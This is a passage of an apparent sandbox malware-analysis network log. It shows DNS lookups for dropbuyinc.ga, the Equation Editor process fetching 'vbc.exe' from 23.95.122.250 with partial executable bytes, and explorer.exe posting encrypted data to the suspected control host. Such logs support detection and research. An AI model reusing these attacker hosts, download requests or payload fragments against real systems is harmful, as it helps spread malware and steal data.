May 16, 2023 12:57:43.859272957 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859292984 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859333038 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.890835047 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.890897989 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.890944958 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.890985966 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891005993 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.891031981 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891077042 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891077042 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.891119003 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891161919 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891207933 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891211033 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.891248941 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891290903 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891336918 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.891336918 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891381025 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891448975 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891490936 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891499996 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.891534090 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891575098 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891618967 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891619921 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.891663074 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891705036 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891747952 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891748905 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.891792059 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891834974 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891876936 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.891879082 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891922951 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.891963959 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892004013 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.892008066 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892050028 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892091990 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892133951 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892146111 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.892180920 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892225027 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892262936 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.892263889 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892311096 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892347097 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.892354965 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892398119 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892437935 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892477036 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.892481089 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892525911 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892571926 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892608881 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.892612934 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892659903 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892705917 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892740965 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.892745018 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892787933 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892827988 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892864943 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.892874956 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892918110 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892957926 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.892992020 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.893001080 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893043995 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893089056 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893126011 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.893132925 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893177986 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893218994 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893254995 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.893260002 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893306971 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893343925 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.893352985 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893397093 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893439054 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.893476963 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.893482924 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.047750950 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.047815084 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.047852993 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.047863007 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.047909975 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.047954082 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.047959089 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048007011 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048057079 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048099041 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.048105955 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048152924 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048204899 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048243999 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.048250914 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048300028 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048336983 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.048345089 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048391104 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048430920 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.048438072 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048485041 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048521042 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.048531055 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048579931 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048619986 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.048641920 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048707008 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048748970 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.048753023 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048799992 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048841953 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.048845053 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048891068 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048937082 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.048937082 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.048984051 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.049019098 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.049030066 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.049076080 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.049113989 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.049120903 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.049166918 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.049205065 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.049215078 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.049264908 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:44.049304008 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:44.054944992 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:45.039823055 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:45.230359077 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:57.493557930 CEST	49173	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:57.684039116 CEST	80	49173	23.230.13.96	192.168.2.22
May 16, 2023 12:57:57.684212923 CEST	49173	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:57.685664892 CEST	49173	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:57.685722113 CEST	49173	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:57.877003908 CEST	80	49173	23.230.13.96	192.168.2.22
May 16, 2023 12:57:58.087845087 CEST	80	49173	23.230.13.96	192.168.2.22
May 16, 2023 12:57:58.088557005 CEST	80	49173	23.230.13.96	192.168.2.22
May 16, 2023 12:57:58.088722944 CEST	49173	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:58.090064049 CEST	49173	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:58.280342102 CEST	80	49173	23.230.13.96	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 16, 2023 12:56:34.642235994 CEST	138	138	192.168.2.22	192.168.2.255
May 16, 2023 12:56:55.475668907 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:56:56.224829912 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:56:56.974951029 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:04.821119070 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:05.571188927 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:06.321223974 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:06.392272949 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:07.142386913 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:07.892492056 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:37.591741085 CEST	50108	53	192.168.2.22	8.8.8.8
May 16, 2023 12:57:38.974803925 CEST	50108	53	192.168.2.22	8.8.8.8
May 16, 2023 12:57:39.621901035 CEST	53	50108	8.8.8.8	192.168.2.22
May 16, 2023 12:57:39.753766060 CEST	54723	53	192.168.2.22	8.8.8.8
May 16, 2023 12:57:39.985779047 CEST	53	50108	8.8.8.8	192.168.2.22
May 16, 2023 12:57:41.331789970 CEST	53	54723	8.8.8.8	192.168.2.22
May 16, 2023 12:57:42.246640921 CEST	54723	53	192.168.2.22	8.8.8.8
May 16, 2023 12:57:42.824501038 CEST	53	54723	8.8.8.8	192.168.2.22
May 16, 2023 12:57:46.964627981 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:47.714209080 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:48.466849089 CEST	137	137	192.168.2.22	192.168.2.255
May 16, 2023 12:57:57.037667990 CEST	58062	53	192.168.2.22	8.8.8.8
May 16, 2023 12:57:57.439505100 CEST	53	58062	8.8.8.8	192.168.2.22
May 16, 2023 12:57:57.472691059 CEST	56703	53	192.168.2.22	8.8.8.8
May 16, 2023 12:57:57.492683887 CEST	53	56703	8.8.8.8	192.168.2.22
May 16, 2023 12:58:08.112170935 CEST	138	138	192.168.2.22	192.168.2.255

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 16, 2023 12:57:39.985953093 CEST	192.168.2.22	8.8.8.8	d013	(Port unreachable)	Destination Unreachable
May 16, 2023 12:57:42.824610949 CEST	192.168.2.22	8.8.8.8	d013	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 16, 2023 12:57:37.591741085 CEST	192.168.2.22	8.8.8.8	0xceee	Standard query (0)	dropbuyinc.ga	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:38.974803925 CEST	192.168.2.22	8.8.8.8	0xceee	Standard query (0)	dropbuyinc.ga	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:39.753766060 CEST	192.168.2.22	8.8.8.8	0xc4a9	Standard query (0)	dropbuyinc.ga	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:42.246640921 CEST	192.168.2.22	8.8.8.8	0xc4a9	Standard query (0)	dropbuyinc.ga	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:57.037667990 CEST	192.168.2.22	8.8.8.8	0xbd6	Standard query (0)	dropbuyinc.ga	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:57.472691059 CEST	192.168.2.22	8.8.8.8	0x14e5	Standard query (0)	dropbuyinc.ga	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 16, 2023 12:57:39.621901035 CEST	8.8.8.8	192.168.2.22	0xceee	No error (0)	dropbuyinc.ga	23.230.13.96	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:39.985779047 CEST	8.8.8.8	192.168.2.22	0xceee	No error (0)	dropbuyinc.ga	23.230.13.96	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:41.331789970 CEST	8.8.8.8	192.168.2.22	0xc4a9	No error (0)	dropbuyinc.ga	23.230.13.96	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:42.824501038 CEST	8.8.8.8	192.168.2.22	0xc4a9	No error (0)	dropbuyinc.ga	23.230.13.96	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:57.439505100 CEST	8.8.8.8	192.168.2.22	0xbd6	No error (0)	dropbuyinc.ga	23.230.13.96	A (IP address)	IN (0x0001)	false
May 16, 2023 12:57:57.492683887 CEST	8.8.8.8	192.168.2.22	0x14e5	No error (0)	dropbuyinc.ga	23.230.13.96	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.95.122.250

gekbvbme.com

dropbuyinc.ga

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	23.95.122.250	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 16, 2023 12:56:33.547269106 CEST	0	OUT	GET /24/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 23.95.122.250 Connection: Keep-Alive
May 16, 2023 12:56:33.697938919 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 16 May 2023 10:56:33 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Mon, 15 May 2023 17:53:33 GMT ETag: "f7978-5fbbf221a9fd1" Accept-Ranges: bytes Content-Length: 1014136 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9d 71 62 64 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 70 05 00 00 00 0a 00 00 00 00 00 db 02 05 00 00 10 00 00 00 80 05 00 00 00 a3 0f 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 10 00 00 b7 ad 0f 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 6c 05 00 50 00 00 00 00 b0 05 00 48 c4 09 00 00 00 00 00 00 00 00 00 00 60 0f 00 78 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 63 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 80 24 00 00 00 80 05 00 00 10 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 c4 09 00 00 b0 05 00 00 d0 09 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELqbdplPH`x.textcp `.data$@.rsrcH@@
May 16, 2023 12:56:33.698133945 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 16, 2023 12:56:33.698158979 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 16, 2023 12:56:33.698189974 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 16, 2023 12:56:33.698209047 CEST	7	IN	Data Raw: d2 a4 0f 01 00 08 00 86 d2 a4 0f 00 00 00 00 00 00 f0 3f 04 00 04 00 00 00 00 00 00 00 00 00 9b d3 a4 0f 07 00 08 00 69 d5 a4 0f 91 d5 a4 0f 70 d5 a4 0f 05 00 08 00 14 d7 a4 0f 00 00 00 00 1b d7 a4 0f 01 00 08 00 b0 d7 a4 0f 05 00 08 00 6d d8 a4 Data Ascii: ?ipmtW^v\\ggik
May 16, 2023 12:56:33.698227882 CEST	8	IN	Data Raw: 1e 04 1f 05 71 71 10 00 15 00 07 00 10 00 01 00 18 00 42 00 43 00 71 00 23 14 16 3e 01 14 1f 3a 14 08 34 09 26 71 23 14 16 20 04 14 03 08 27 10 1d 04 14 34 09 26 71 23 14 16 32 1d 1e 02 14 3a 14 08 71 32 03 08 01 05 30 12 00 04 18 03 14 32 1e 1f Data Ascii: qqBCq#>:4&q# '4&q#2:q202&q229q295q25:q25q24q25:q259q2#2qqBCq2&!&q
May 16, 2023 12:56:33.698246956 CEST	9	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 16, 2023 12:56:33.698266029 CEST	11	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 16, 2023 12:56:33.698286057 CEST	12	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 16, 2023 12:56:33.698306084 CEST	14	IN	Data Raw: a3 0f bf 24 80 a8 0f 66 83 3e 71 74 71 56 e8 a0 ff ff ff 6a ff 68 bc 80 a8 0f 8d 95 f8 fd ff ff 52 e8 bc 02 00 00 8d 95 f8 fd ff ff 52 e8 42 01 00 00 83 f8 00 75 02 eb 7c 89 c3 31 c0 8d 48 ff 66 b8 71 00 87 f7 f2 66 af 87 f7 80 3e 71 74 2b 56 e8 Data Ascii: $f>qtqVjhRRBu\|1Hfqf>qt+VRSuJ1HqF1ffFFF~F F}7f[_^UVWSuu6uNvuttw
May 16, 2023 12:56:33.833107948 CEST	15	IN	Data Raw: 0f ff 25 38 10 a3 0f ff 25 74 10 a3 0f ff 25 94 10 a3 0f ff 25 18 11 a3 0f ff 25 04 11 a3 0f ff 25 84 11 a3 0f ff 25 58 11 a3 0f ff 25 00 11 a3 0f ff 25 00 10 a3 0f ff 25 d8 10 a3 0f ff 25 04 10 a3 0f ff 25 48 10 a3 0f ff 25 14 10 a3 0f ff 25 18 Data Ascii: %8%t%%%%%X%%%%%H%%%%l%p%%D%d%%h%%%P%d%%%%<%%%%%%l%t%% %%

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49172	23.230.13.96	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 16, 2023 12:57:42.490221977 CEST	1080	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gekbvbme.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: dropbuyinc.ga
May 16, 2023 12:57:42.490282059 CEST	1080	OUT	Data Raw: 6e e2 e2 88 b3 3d f0 12 6e 13 b2 67 48 59 f8 8e a9 53 e8 27 32 fd cb e3 f7 9c 7a 6e dc 3d 42 75 32 b9 9d b9 07 d1 88 d3 13 bd c4 f1 99 ac 30 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 fb bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 16 9d 98 a6 Data Ascii: n=ngHYS'2zn=Bu20&7H8.6hEvRY;PLwHy.nY0TL!]O/Q48J2Qtcv,2es[!QI%5M
May 16, 2023 12:57:42.937711000 CEST	1081	IN	HTTP/1.1 404 Not Found Date: Tue, 16 May 2023 10:57:42 GMT Server: Apache/2.4.56 (Debian) Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 35 32 63 65 37 0d 0a 18 00 00 00 a0 5f e8 0a 27 e8 c8 da 8d 2a 7f ba 53 e4 29 1d ec 5d a3 3f 18 cd 8f ba 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 2b 05 72 aa a5 4f 77 81 af 4e 3d 0f 21 04 3c 00 9f 17 ad a1 b5 c9 66 2e 64 c8 ec ad 2e 36 73 83 3c e7 57 dc 15 49 d9 6c 38 e7 37 a0 a3 60 a8 e4 f9 48 54 c3 c6 c2 c8 ce 27 fc 76 64 9b 6c fc 27 4d 8b 66 a0 0e 5c 9f 43 f5 b4 3b 67 b1 3d 28 a6 5f 5c fb e1 dc c6 46 cb a6 b4 4d 5f 1c ba 3b 6c a9 3f a5 bc 09 97 81 31 0b ca c1 a8 bb df f6 e0 65 8c 4e e1 b4 80 09 6b f6 1d 9f 87 8e 5f fb e7 76 3a d6 81 76 6a 2c f9 42 1b 7d fb fd 65 7d ee 7c fb 47 a8 b1 95 23 a7 1a 4d 5a a0 a3 2b 0e bf 0f 06 4f 85 94 f6 64 27 a8 ee 54 99 27 c4 f5 c3 9d 85 a7 62 f0 2e 91 c7 df b8 da a4 51 62 a7 49 ca 7e a1 37 41 c8 5a 56 82 66 2a 